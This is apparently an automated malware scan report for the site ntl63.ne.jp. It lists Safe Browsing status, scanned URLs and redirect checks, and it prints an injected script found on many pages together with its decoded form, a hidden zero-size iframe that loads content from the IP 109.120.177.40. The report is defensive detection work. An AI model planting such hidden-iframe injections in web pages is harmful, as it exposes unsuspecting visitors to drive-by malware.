Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ntl63.ne.jp
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.ntl63.ne.jp/ | 200 OK Content-Length: 49404 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 109.120.177.40 var tds_url = 'http://109.120.177.40'; var group = 'zxzzzzzdddff/mx'; var charset = 'utf-8'; var referer = encodeURIComponent(document.referrer); var url = tds_url + '/' + group + '&se_referer=' + referer + '&charset=' + charset; document.write(''); Decoded script: <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://109.120.177.40/zxzzzzzdddff/mx&se_referer=undefined&charset=utf-8"></iframe> | ||
http://www.ntl63.ne.jp/?p=618 | 200 OK Content-Length: 28230 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 109.120.177.40 var tds_url = 'http://109.120.177.40'; var group = 'zxzzzzzdddff/mx'; var charset = 'utf-8'; var referer = encodeURIComponent(document.referrer); var url = tds_url + '/' + group + '&se_referer=' + referer + '&charset=' + charset; document.write(''); Decoded script: <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://109.120.177.40/zxzzzzzdddff/mx&se_referer=undefined&charset=utf-8"></iframe> | ||
http://www.ntl63.ne.jp/?cat=6 | 200 OK Content-Length: 50426 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 109.120.177.40 var tds_url = 'http://109.120.177.40'; var group = 'zxzzzzzdddff/mx'; var charset = 'utf-8'; var referer = encodeURIComponent(document.referrer); var url = tds_url + '/' + group + '&se_referer=' + referer + '&charset=' + charset; document.write(''); Decoded script: <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://109.120.177.40/zxzzzzzdddff/mx&se_referer=undefined&charset=utf-8"></iframe> | ||
http://www.ntl63.ne.jp/?cat=5 | 200 OK Content-Length: 49556 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 109.120.177.40 var tds_url = 'http://109.120.177.40'; var group = 'zxzzzzzdddff/mx'; var charset = 'utf-8'; var referer = encodeURIComponent(document.referrer); var url = tds_url + '/' + group + '&se_referer=' + referer + '&charset=' + charset; document.write(''); Decoded script: <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://109.120.177.40/zxzzzzzdddff/mx&se_referer=undefined&charset=utf-8"></iframe> | ||
http://www.ntl63.ne.jp/?cat=3 | 200 OK Content-Length: 38950 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 109.120.177.40 var tds_url = 'http://109.120.177.40'; var group = 'zxzzzzzdddff/mx'; var charset = 'utf-8'; var referer = encodeURIComponent(document.referrer); var url = tds_url + '/' + group + '&se_referer=' + referer + '&charset=' + charset; document.write(''); Decoded script: <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://109.120.177.40/zxzzzzzdddff/mx&se_referer=undefined&charset=utf-8"></iframe> | ||
http://www.ntl63.ne.jp/?cat=4 | 200 OK Content-Length: 49957 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 109.120.177.40 var tds_url = 'http://109.120.177.40'; var group = 'zxzzzzzdddff/mx'; var charset = 'utf-8'; var referer = encodeURIComponent(document.referrer); var url = tds_url + '/' + group + '&se_referer=' + referer + '&charset=' + charset; document.write(''); Decoded script: <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://109.120.177.40/zxzzzzzdddff/mx&se_referer=undefined&charset=utf-8"></iframe> | ||
http://www.ntl63.ne.jp/wp-content/uploads/2012/02/120209-03.jpg | 200 OK Content-Length: 79521 Content-Type: image/jpeg | clean |
http://www.ntl63.ne.jp/test404page.js | 404 Not Found Content-Length: 1621 Content-Type: text/html | clean |
http://www.ntl63.ne.jp/?p=611 | 200 OK Content-Length: 24733 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 109.120.177.40 var tds_url = 'http://109.120.177.40'; var group = 'zxzzzzzdddff/mx'; var charset = 'utf-8'; var referer = encodeURIComponent(document.referrer); var url = tds_url + '/' + group + '&se_referer=' + referer + '&charset=' + charset; document.write(''); Decoded script: <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://109.120.177.40/zxzzzzzdddff/mx&se_referer=undefined&charset=utf-8"></iframe> | ||
http://www.ntl63.ne.jp/?p=606 | 200 OK Content-Length: 23310 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 109.120.177.40 var tds_url = 'http://109.120.177.40'; var group = 'zxzzzzzdddff/mx'; var charset = 'utf-8'; var referer = encodeURIComponent(document.referrer); var url = tds_url + '/' + group + '&se_referer=' + referer + '&charset=' + charset; document.write(''); Decoded script: <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://109.120.177.40/zxzzzzzdddff/mx&se_referer=undefined&charset=utf-8"></iframe> | ||
http://www.ntl63.ne.jp/ryuuzan/ | 200 OK Content-Length: 31908 Content-Type: text/html | clean |
http://xxxindianxxx.com/st/css/jquery-1.6.5.min.js | 404 Not Found Content-Length: 571 Content-Type: text/html | clean |
http://www.insightcrime.org/media/system/js/jquery-1.6.5.min.js | 404 Not Found Content-Length: 319 Content-Type: text/html | clean |
http://www.ntl63.ne.jp/?p=603 | 200 OK Content-Length: 23953 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 109.120.177.40 var tds_url = 'http://109.120.177.40'; var group = 'zxzzzzzdddff/mx'; var charset = 'utf-8'; var referer = encodeURIComponent(document.referrer); var url = tds_url + '/' + group + '&se_referer=' + referer + '&charset=' + charset; document.write(''); Decoded script: <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://109.120.177.40/zxzzzzzdddff/mx&se_referer=undefined&charset=utf-8"></iframe> | ||
http://www.ntl63.ne.jp/ryuuzan/wp-content/uploads/2012/02/120206-01.jpg | 200 OK Content-Length: 43964 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ntl63.ne.jp
Result:
GET / HTTP/1.1
Host: ntl63.ne.jp
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ntl63.ne.jp
Referer: http://www.google.com/search?q=ntl63.ne.jp
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ntl63.ne.jp
Referer: http://www.google.com/search?q=ntl63.ne.jp
Result:
The result is similar to the first query. There are no suspicious redirects found.